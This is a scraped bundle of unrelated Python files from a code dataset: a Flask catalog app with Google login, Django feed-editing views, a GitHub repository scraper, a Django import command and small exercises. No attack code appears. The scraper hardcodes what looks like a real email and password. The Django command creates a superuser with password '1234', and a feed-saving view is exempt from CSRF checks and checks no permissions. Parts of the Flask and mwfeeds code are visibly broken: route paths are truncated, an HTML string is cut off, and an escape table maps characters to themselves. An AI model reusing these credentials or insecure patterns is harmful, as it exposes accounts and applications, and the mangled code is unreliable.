break\n\n\nif __name__ == '__main__':\n mpl_file = sys.argv[1]\n with open(mpl_file, 'r') as f:\n for line_index, line in enumerate(f.readlines()):\n process_line(line, line_index)\n\n for symbol in symbol_table:\n print(symbol)\n","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508840713","text":"# https://contest.yandex.ru/contest/28069/problems/E/\n\nclass BSTNode:\n def __init__(self, key=None):\n self.key = key\n self.left = None\n self.right = None\n\n def insert_recursive(self, key):\n if self.key is None:\n self.key = key\n return self\n\n if key == self.key:\n return self\n\n if key < self.key:\n if self.left:\n return self.left.insert_recursive(key)\n self.left = BSTNode(key)\n return self.left\n\n if self.right:\n return self.right.insert_recursive(key)\n self.right = BSTNode(key)\n return self.right\n\n def __iter__(self):\n if self.left:\n for node in self.left:\n yield node\n yield self\n if self.right:\n for node in self.right:\n yield node\n\n\ndef leaves(keys):\n bst = BSTNode()\n for key in keys:\n bst.insert_recursive(key)\n\n results = []\n\n for node in bst:\n if not node.left and not node.right:\n results.append(node.key)\n\n return results\n\n\nassert leaves([7, 3, 2, 1, 9, 5, 4, 6, 8]) == [1, 4, 6, 8]\nassert leaves([7, 3, 3, 3, 2, 1, 9, 5, 4, 6, 8]) == [1, 4, 6, 8]\nassert leaves([9, 4, 2, 1]) == [1]\nassert leaves([1, 6, 8, 2]) == [2, 8]\nassert leaves([1, 7]) == [7]\nassert leaves([7, 1]) == [1]\nassert leaves([3, 1, 2]) == [2]\nassert leaves([3, 1, 2, 0]) == [0, 2]\nassert leaves([5, 4, 3, 2, 1, 0, -1, -2, -3, -4, -5]) == [-5]\nassert leaves([-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5]) == [5]\nassert leaves([4, 2, 4, 6, 2, 4, 1, 6, 2, 4, 3, 1, 6, 2, 4, 5, 3, 1, 6, 2, 4, 7, 5, 3, 1, 6, 2, 4]) == \\\n [1, 3, 5, 7]\n\n\ndef main():\n keys = list(map(int, input().split()))[:-1]\n for key in leaves(keys):\n print(key)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw8/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"594045514","text":"from flask import (\n Flask,\n jsonify,\n request,\n url_for,\n redirect,\n abort,\n g,\n render_template,\n make_response,\n flash,\n session as login_session,\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\nfrom sqlalchemy import create_engine, asc, desc\nfrom models import Base, User, Category, Item\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_login import (\n LoginManager,\n login_user,\n logout_user,\n current_user,\n login_required,\n)\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport requests\nimport json\nimport random\nimport string\n#kiran added\nimport ctypes\n\n#ctypes.windll.shell32.IsUserAnAdmin() windows code required when not running as administrator\nengine = create_engine('sqlite:///catalog_temp_data.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\napp = Flask(__name__)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'showLogin'\n\nCLIENT_ID = json.loads(open('g_auth.json', 'r').read())['web']['client_id']\n\n\n@app.before_request\ndef before_request():\n g.user = 
current_user\n\n\n@app.route('/token')\n@login_required\ndef get_auth_token():\n token = g.user.generate_auth_token()\n return jsonify({'token': token.decode('ascii')})\n\n\n# Google Login\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n code = request.data\n try:\n # Upgrade the auth code into a credentials object\n oauth_flow = flow_from_clientsecrets('g_auth.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps(\n 'Failed to upgrade the authorization code.'),\n 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n\n # If there was an error in the acces token info...abort\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\n 'Token user ID does not match given user ID'),\n 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for the app\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\n 'Token client id does not match app id'),\n 401)\n response.headers['Content-Type'] = 'application/json'\n return reponse\n\n stored_credentials = login_session.get('credentials')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_credentials is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps(\n 'Current user is already connected'),\n 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later user\n login_session['provider'] = 'google'\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n # See if user exists, if not...create a new user\n user_id = getUserId(login_session['email'])\n if not user_id:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n\n # Log user into the login manager\n user = session.query(User).filter_by(id=user_id).one()\n login_user(user)\n\n flash(\"Successful log on via Google\")\n # Welcome the user\n output = ''\n output += '
<h1>Welcome, '\n    output += login_session['username']\n    output += '!</h1>
'\n output += '/items/')\ndef showCategory(category):\n categories = session.query(Category).all()\n items = (\n session.query(\n Item\n )\n .join(Category)\n .filter(Category.name == str(category))\n .all()\n )\n if items:\n print (\"Should be rendering items in a category\")\n return render_template('categories.html',\n categories=categories,\n items=items,\n cur_cat=category)\n else:\n return render_template('categories.html',\n categories=categories,\n cur_cat=category)\n\n\n@app.route('/catalog///')\ndef showItem(category, item_name):\n item = session.query(Item).filter(Item.title == str(item_name)).first()\n return render_template('itemDescription.html', item=item)\n\n\n@app.route('/catalog/add/', methods=['GET', 'POST'])\n@login_required\ndef addItem():\n categories = session.query(Category).all()\n if request.method == 'GET':\n return render_template('addItem.html', categories=categories)\n if request.method == 'POST':\n form_title = request.form.get('title', None)\n form_description = request.form.get('description', None)\n form_category = request.form.get('cat_select', 'Misc.')\n if (\n form_title is None or\n form_description is None or\n form_category is None\n ):\n error = \"Title, description, and category are all required\"\n return render_template('addItem.html',\n categories=categories,\n error=error)\n category = session.query(\n Category\n ).filter_by(name=form_category).first()\n newItem = Item(title=request.form['title'],\n description=request.form['description'],\n category_id=category.id,\n user_id=login_session['user_id'])\n session.add(newItem)\n session.commit()\n flash(\"Item Added\")\n return redirect(url_for('homePage'))\n\n\n@app.route('/catalog//edit/', methods=['GET', 'POST'])\n@login_required\ndef editItem(item_name):\n item = session.query(Item).filter_by(title=item_name).first()\n categories = session.query(Category).all()\n if int(login_session['user_id']) != int(item.user_id):\n return render_template('notAuthorized.html')\n if request.method == 'GET':\n return render_template('editItem.html',\n categories=categories,\n item=item)\n if request.method == 'POST':\n newItem = item\n if request.form['title']:\n newItem.title = request.form['title']\n if request.form['description']:\n newItem.description = request.form['description']\n if request.form['cat_select']:\n category_selected = request.form['cat_select']\n category_for_item = session.query(\n Category\n ).filter_by(name=category_selected).first()\n newItem.category_id = category_for_item.id\n session.add(newItem)\n session.commit()\n flash(\"Item Edited\")\n return render_template('itemDescription.html', item=newItem)\n\n\n@app.route('/catalog//delete/', methods=['GET', 'POST'])\n@login_required\ndef deleteItem(item_name):\n item = session.query(Item).filter(Item.title == str(item_name)).first()\n current_category = item.category.name\n if int(login_session['user_id']) != int(item.user_id):\n return render_template('notAuthorized.html')\n if request.method == 'GET':\n return render_template('deleteItem.html', i_name=item_name)\n if request.method == 'POST':\n session.delete(item)\n session.commit()\n flash(\"Item Deleted\")\n return redirect(url_for('homePage'))\n\n\n# Create a state token to prefent request forgery\n# Store it in the session for later validation\n@app.route('/login', methods=['GET', 'POST'])\ndef showLogin():\n if request.method == 'GET':\n state = ''.join(\n random.choice(\n string.ascii_uppercase + string.digits\n ) for x in xrange(32))\n login_session['state'] = state\n return 
render_template('login.html', STATE=state, cid=CLIENT_ID)\n return redirect(url_for('homePage'))\n\n\n# Generic Disconnect (multiple providers)\n@app.route('/disconnect')\ndef disconnect():\n if 'provider' in login_session:\n print (\"Disconnecting from provider: %s\" % login_session['provider'])\n if login_session['provider'] == 'google':\n gdisconnect()\n del login_session['gplus_id']\n del login_session['access_token']\n login_session.pop('username', None)\n login_session.pop('email', None)\n login_session.pop('picture', None)\n login_session.pop('user_id', None)\n login_session.pop('provider', None)\n logout_user()\n print (\"Disconnect: User logged out\")\n flash(\"You have successfully been logged out\")\n return redirect(url_for('homePage'))\n\n\n# Helpers for User ops:\ndef getUserId(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\ndef getUserInfo(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef createUser(login_session):\n newUser = User(username=login_session['username'],\n email=login_session['email'],\n picture=login_session['picture'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one()\n return user.id\n\n\n# Required for login_manager\n@login_manager.user_loader\ndef user_loader(user_id):\n return session.query(User).filter_by(id=user_id).first()\n\n\nif __name__ == '__main__':\n app.secret_key = json.loads(\n open('g_auth.json', 'r')\n .read())['web']['client_secret']\n app.debug = False\n app.run(host='0.0.0.0', port=8000)\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":13492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"67352799","text":"import sys\nfrom PyQt5 import QtWidgets,QtGui\nfrom PyQt5.QtWidgets import QApplication,QWidget\n\nfrom form import Ui_Form\n\nclass myWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.initUi()\n def initUi(self):\n ui = Ui_Form()\n ui.setupUi(self)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n w = myWindow()\n w.show()\n\n sys.exit(app.exec_())\n\n\n \n\n\n","sub_path":"useUi.py","file_name":"useUi.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"37934225","text":"from mainapp.models import BookCategory, Books\nfrom django.core.management.base import BaseCommand\nfrom auth_app.models import BookUser\nfrom csv import DictReader\n\n\ndef load_books():\n \"\"\" Загрузка CSV-файла с данными для базы. \"\"\"\n \n fields = ['topic','tags','number','author','title','comment','serial','number_serial','folder','file']\n with open('books.csv', 'r', encoding='utf-8') as book_file:\n dw = DictReader(book_file, fields, dialect='excel-tab')\n return list(dw)\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n \"\"\"Заполнение БД. 
\"\"\"\n\n data = load_books()\n\n for d in data:\n new_book = Books()\n new_book.name=d['title']\n new_book.author = d['author']\n new_book.annotation = d['comment']\n if not len(BookCategory.objects.filter(name=d['topic'])):\n new_cat = BookCategory()\n new_cat.name=d['topic']\n new_cat.save()\n\n new_book.cat_fk = BookCategory.objects.filter(name=d['topic']).first()\n new_book.save()\n\n super_user = BookUser.objects.create_superuser('velimudr', 'velimudr@yandex.ru', '1234', age=40)","sub_path":"book_lib/mainapp/management/commands/imp_db.py","file_name":"imp_db.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"202593554","text":"import json\nfrom quantaq.endpoints import (\n Domain, \n GET, PUT, POST, DELETE\n)\n\n\nclass Data(Domain):\n \"\"\"Initialize the Data group of endpoints.\n\n :returns: Domain for Data\n :rtype: quantaq.models.Data\n \"\"\"\n def __init__(self, client) -> None:\n super(Data, self).__init__(client)\n\n def list(self, **kwargs) -> list:\n \"\"\"Return all data for device with serial number sn.\n\n :param str sn: The device serial number\n :param bool raw: Return the raw (not final), default is False\n :param str start: Start date for data retrieval\n :param str stop: End date for data retrieval\n :param str limit: Limit the number of results returned\n :param str sort: Sort the results by a specific attribute\n :param str filter: Filter the query\n :param int per_page: Define the number of results to return per page\n\n :returns: Data\n :rtype: list of dict\n \"\"\"\n sn = kwargs.pop(\"sn\")\n raw = kwargs.pop(\"raw\", False)\n endpoint = \"devices/\" + sn + \"/data/\"\n \n if raw:\n endpoint += \"raw/\"\n\n return self.client.requests(endpoint, **kwargs)\n\n def bydate(self, **kwargs) -> list:\n \"\"\"Return all data for a device with serial number \n on date .\n\n :param str sn: The device serial number\n :param str date: The date to retrieve data for in YYYY-MM-DD format (all GMT).\n :param bool raw: Return the raw (not final), default is False\n\n :returns: Data\n :rtype: list of dicts\n \"\"\"\n sn = kwargs.pop(\"sn\")\n date = kwargs.pop(\"date\")\n raw = kwargs.pop(\"raw\", False)\n\n endpoint = \"devices/\" + sn + \"/data-by-date/\"\n if raw:\n endpoint += \"raw/\"\n \n endpoint += date + \"/\"\n\n return self.client.requests(endpoint)\n\n def get(self, **kwargs) -> dict:\n \"\"\"Return a single data point.\n\n :param str sn: The device serial number\n :param int id: The id of the data point\n :param bool raw: Return the raw (not final), default is False\n\n :returns: Data information\n :rtype: dict\n \"\"\"\n sn = kwargs.pop(\"sn\")\n id = kwargs.pop(\"id\")\n raw = kwargs.pop(\"raw\", False)\n\n endpoint = \"devices/\" + sn + '/data/'\n if raw:\n endpoint += \"raw/\"\n endpoint += str(id)\n\n return self.client.requests(endpoint)\n","sub_path":"quantaq/endpoints/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346245494","text":"import requests\nimport json\nimport time\nstart_time = time.time()\nheaders = {\n 'Cookie': '_ga=GA1.2.1070810950.1562851528; _octo=GH1.1.620303813.1562851528; logged_in=yes; dotcom_user=zelincode; _gat=1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36',\n 'Host': 'api.github.com'\n}\n# url = 
\"https://api.github.com/search/repositories?q=stars%3A%3E1&page={}&per_page=100&sort=stars\"\nurl = \"https://api.github.com/search/repositories?q=stars%3A100..{}&page={}&per_page=100&sort=stars\"\njson_filename = 'github.json' #这是json文件存放的位置\nstars = 304025\nnum= 0 #\ncount = 0 #总共调用API次数\ni =0 #每次搜索后页面循环次数\nwhile 1:\n i = (i+1)%10\n if(count == 5000):\n stop_time = time.time()\n duration = stop_time - start_time\n time.sleep(3600-duration)\n start_time = time.time()\n count=0\n try:\n r = requests.get(url.format(stars,i),headers,timeout = 5)\n count += 1\n response_dict = r.json()\n print(\"Total repositories:\", response_dict['total_count'])\n with open(json_filename,\"a\",encoding = \"utf-8\") as f:\n repo_dicts = response_dict['items']\n for repo_dict in repo_dicts:\n num += 1\n info=[]\n\n ##repo的信息\n info.append(repo_dict['name'])\n info.append(repo_dict[\"description\"])\n info.append(repo_dict[\"html_url\"])\n info.append(repo_dict['stargazers_count'])\n info.append(repo_dict['watchers']) #watchers\n info.append(repo_dict['forks']) #forks\n\n info.append(repo_dict['created_at'])\n info.append(repo_dict['updated_at'])\n info.append(repo_dict['language'])\n\n ##下面是owner的信息\n name = repo_dict['owner']['login']\n info.append(name)\n myURL=\"https://api.github.com/users/\"+name\n context = requests.get(myURL,headers,auth=(\"771958907@qq.com\",\"ww050607\"),timeout = 5).json()\n count += 1\n info.append(context['company'])\n info.append(context['location']) #\n info.append(context[\"public_repos\"]) #public_repos\n info.append(context[\"followers\"]) #followers\n info.append(context[\"following\"]) #\n info.append(context[\"created_at\"]) #\n info.append(context[\"updated_at\"]) #\n\n\n\n\n f.write(str(info).lstrip(\"[\").rstrip(\"]\")+ '\\n')\n print(num,\"爬取完成\")\n if(num == 1000):\n break\n\n except requests.exceptions.RequestException as e:\n print(e)\n\n","sub_path":"Github分析/api_stars_1000.py","file_name":"api_stars_1000.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14071759","text":"import unittest\nfrom money_change_again import change\n\n\ndef reference(money):\n min_coins = float(\"inf\")\n\n for num1 in range(money + 1):\n for num3 in range(money // 3 + 1):\n for num4 in range(money // 4 + 1):\n if 1 * num1 + 3 * num3 + 4 * num4 == money:\n min_coins = min(min_coins, num1 + num3 + num4)\n\n return min_coins\n\n\nclass MoneyChangeAgain(unittest.TestCase):\n def test_small(self):\n for money in range(1, 40):\n self.assertEqual(change(money), reference(money))\n\n def test_large(self):\n for money, answer in ((200, 50), (239, 60), (31, 8)):\n self.assertEqual(change(money), answer)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"money_change_again/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"43669173","text":"\"\"\"\nThis module handles communication of data to the FPAA\n\"\"\"\n\nimport os\nfrom os.path import join\nfrom dowel import logger\nfrom time import sleep\n\n\nclass FpaaConfig:\n def __init__(self, config_data=None):\n \"\"\"This class handles flashing and evaluating the FPAA bitstream\"\"\"\n clean_config_dir()\n self.id = get_new_id()\n if config_data is not None:\n self.load_fpaa(config_data)\n\n @property\n def basedir(self):\n \"\"\"Returns this bitstream's directory.\"\"\"\n return join(get_config_dir(), 
str(self.id))\n\n def load_fpaa(self, config_data):\n \"\"\"Loads a 2d array of configuration data onto to the FPAA\"\"\"\n logger.start_timer() \n raise NotImplementedError\n logger.stop_timer('INTERFACE.PY load_fpaa')\n\n def evaluate(self, data):\n \"\"\"Evaluates given data on the FPAA.\"\"\"\n logger.start_timer()\n results = []\n for datum in data:\n pred = None\n while pred is None:\n try:\n raise NotImplementedError\n except (UnicodeDecodeError, ValueError):\n pass\n results.append(pred) \n logger.stop_timer('INTERFACE.PY Evaluation complete')\n return results\n","sub_path":"varro/fpaa/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"515713454","text":"# Copyright 2009 Gabriel Farrell\n#\n# This file is part of Kochief.\n#\n# Kochief is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Kochief is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Kochief. If not, see .\n\nfrom django.conf.urls.defaults import *\n\nurlpatterns = patterns('kochief.cataloging.views',\n url(r'^r/(.*)\\.rdf$', 'resource_view', {'format': 'xml'},\n name='resource_rdf'),\n url(r'^r/(.*)\\.n3$', 'resource_view', {'format': 'n3'},\n name='resource_n3'),\n url(r'^r/(.*)\\.nt$', 'resource_view', {'format': 'nt'},\n name='resource_nt'),\n url(r'^r/(.*)$', 'resource_view', name='resource'),\n)\n","sub_path":"kochief/cataloging/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344858737","text":"from pymongo import MongoClient\r\nimport cgi\r\nimport sys\r\nimport json\r\nimport cgitb\r\nimport configparser\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport mwfeeds.controlers.ParseFeed\r\nimport mwfeeds.controlers.GetJavascriptPage\r\nfrom django.http import JsonResponse\r\nfrom django.shortcuts import render\r\nfrom django.views.decorators.csrf import csrf_exempt\r\n\r\ncgitb.enable()\r\nconfig = configparser.ConfigParser()\r\nconfig.read('/opt/python/current/app/mwfeeds/mwfeeds.cfg')\r\n\r\ndef index(req):\r\n id = req.GET.get('id', '')\r\n if id == '':\r\n c = {}\r\n c['id'] = id\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n c[\"subView\"] = \"EditFeed.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n else:\r\n return editById(req,id)\r\n\r\ndef editHTMLById(req,myFeed):\r\n c = {}\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n c = myFeed\r\n thisURL = c[\"url\"]\r\n try:\r\n uglyHTML = \"\"\r\n if c[\"javascriptEnabled\"] == True:\r\n uglyHTML = 
mwfeeds.controlers.GetJavascriptPage.getJavascriptPage(c[\"url\"])\r\n else:\r\n fp = urllib.request.urlopen(thisURL)\r\n mybytes = fp.read()\r\n uglyHTML = mybytes.decode(\"utf8\")\r\n c[\"HTMLSourceText\"] = uglyHTML\r\n prettyHTML = BeautifulSoup(uglyHTML, 'html.parser').prettify()\r\n html_escape_table = {\r\n \"&\": \"&\",\r\n '\"': \""\",\r\n \"'\": \"'\",\r\n \">\": \">\",\r\n \"<\": \"<\",\r\n \" \": \" \",\r\n \"\\n\": \"
<br>
\"\r\n }\r\n c[\"HTMLPrettyText\"] = \"\".join(html_escape_table.get(c,c) for c in prettyHTML)\r\n fp.close()\r\n except:\r\n c[\"HTMLSourceText\"] = \"Unable to load \"+thisURL\r\n if myFeed[\"feedType\"] == \"HTML\":\r\n c[\"id\"] = c[\"_id\"]\r\n c[\"subView\"] = \"EditFeedHTML.pyv\"\r\n c[\"HTMLMatchList\"] = json.dumps(mwfeeds.controlers.ParseFeed.parseFeed(c))\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editSetEncodingById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedSetEncoding.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editCombineById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedCombine.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editSharepointById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedSharepoint.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editRegionFixById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedRegionFix.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editNotSupported(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedNotSupported.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editById(req,id):\r\n try:\r\n c = {}\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n client = MongoClient(config.get(\"active\", \"DBUrl\"))\r\n db = client.mwfeeds\r\n feedsCollection = db.feeds\r\n myFeed = feedsCollection.find_one({\"_id\":int(id)})\r\n myFeed[\"id\"] = myFeed[\"_id\"]\r\n if myFeed[\"feedType\"] == \"HTML\":\r\n return editHTMLById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"SetEncoding\":\r\n return editSetEncodingById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"Combine\":\r\n return editCombineById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"Sharepoint\":\r\n return editSharepointById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"RegionFix\" or myFeed[\"feedType\"] == \"Region Fix\":\r\n return editRegionFixById(req,myFeed)\r\n else:\r\n return editNotSupported(req,myFeed)\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n except Exception as ex:\r\n c[\"subView\"] = \"Login.pyv\"\r\n c[\"message\"] = str(ex)\r\n return render(req, 
\"index.pyv\", c, content_type=\"text/html\")\r\n\r\n@csrf_exempt\r\ndef save(req):\r\n try:\r\n raw=req.body.decode(\"utf-8\")\r\n form = json.loads(raw)\r\n req.content_type = \"application/json\"\r\n client = MongoClient(config.get(\"active\", \"DBUrl\"))\r\n db = client.mwfeeds\r\n feedsCollection = db.feeds\r\n outArray = form\r\n feedsCollection.find_one_and_update({\"_id\": int(form[\"id\"])},{\"$set\": outArray})\r\n return JsonResponse({\"success\": True})\r\n except Exception as e:\r\n return JsonResponse({\"success\": False, \"message\": str(e)})","sub_path":"mwfeeds/controlers/EditFeed.py","file_name":"EditFeed.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"282783676","text":"from pathlib import Path\nimport requests\nimport logging\nimport util\nimport subprocess\n\nserver_tests_enabled = True # use True to invoke server_tests on server startup\n\n\"\"\"\n These are server tests for the default Sample DB.\n See https://github.com/valhuber/ApiLogicServer/wiki/Tutorial#customize-server-startup\n\n Disable this, above\n\"\"\"\n\napi_logic_server_summary = True # Prints a banner\n\n\ndef prt(msg: any) -> None:\n util.log(f'{msg}')\n\n\ndef get_project_dir() -> str:\n \"\"\"\n :return: ApiLogicServer dir, eg, /Users/val/dev/ApiLogicServer\n \"\"\"\n path = Path(__file__)\n parent_path = path.parent\n parent_path = parent_path.parent\n return parent_path\n\n\ndef server_tests(host, port, version):\n \"\"\" called by api_logic_server_run.py, for any tests on server start\n args\n host - server host\n port - server port\n version - ApiLogicServer version\n \"\"\"\n\n if api_logic_server_summary:\n util.log(f'\\nAPILOGICSERVER SUMMARY')\n util.log(f'======================\\n')\n prt(f''\n f'1. CUSTOMIZABLE SERVER PROJECT CREATED\\n'\n f' .. Explore your project - open with IDE/Editor at {get_project_dir()}\\n'\n f'2. SERVER STARTED\\n'\n f' .. Explore your API - Swagger at http://{host}:{port}\\n'\n f' .. Re-run it later - python api_logic_server_run.py\\n'\n f'3. LOGIC enabled\\n'\n f' .. Explore it at {get_project_dir()}/logic/logic_bank.py\\n'\n f' .. E.g., see https://github.com/valhuber/ApiLogicServer/blob/main/api_logic_server_cli/nw_logic.py\\n'\n f'4. BASIC WEB APP Created\\n'\n f' .. Start it: python ui/basic_web_app/run.py [host port]]\\n'\n f' .. Then, explore it - http://0.0.0.0:8080/ (login: admin, p)\\n'\n f' .. See https://github.com/valhuber/ApiLogicServer/wiki/Tutorial#3-explore-the-basic-web-app\\n'\n f'\\n'\n f'===> For more information, see https://github.com/valhuber/ApiLogicServer/wiki/Tutorial\\n'\n f'\\n'\n f'SUCCESSFUL SERVER START (ApiLogicServer Version {version}) - see ApiLogicServer Summary, above\\n')\n","sub_path":"prototype/test/server_startup_test.py","file_name":"server_startup_test.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257755728","text":"\"\"\"\nThe Python standard library's 'calendar' module allows you to\nrender a calendar to your terminal.\nhttps://docs.python.org/3.6/library/calendar.html\n\nWrite a program that accepts user input of the form\n `14_cal.py month [year]`\nand does the following:\n - If the user doesn't specify any input, your program should\n print the calendar for the current month. 
